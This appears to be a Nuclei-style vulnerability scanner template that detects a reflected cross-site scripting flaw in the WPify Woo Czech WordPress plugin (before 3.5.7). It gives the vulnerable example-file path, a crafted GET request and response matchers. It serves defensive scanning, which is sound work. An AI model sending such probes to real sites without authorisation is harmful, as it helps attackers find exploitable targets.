id: wpify-woo-czech-xss
info:
name: WPify Woo Czech < 3.5.7 - Reflected Cross-Site Scripting (XSS)
author: Akincibor
severity: medium
description: The plugin uses the Vies library v2.2.0, which has a sample file outputting $_SERVER['PHP_SELF'] in an attribute without being escaped first, leading to a Reflected Cross-Site Scripting. The issue is only exploitable when the web server has the PDO driver installed, and write access to the example directory (otherwise an exception will be raised before the payload is output)..
reference:
- https://wpscan.com/vulnerability/5c66c32b-22f2-4b59-a6b2-b8da944cdc3c
metadata:
verified: true
tags: wp,wordpress,xss,wp-plugin,wpify,wpscan
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpify-woo/deps/dragonbe/vies/examples/async_processing/queue.php/">'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '">'
- 'Add a new VAT ID to the queue'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200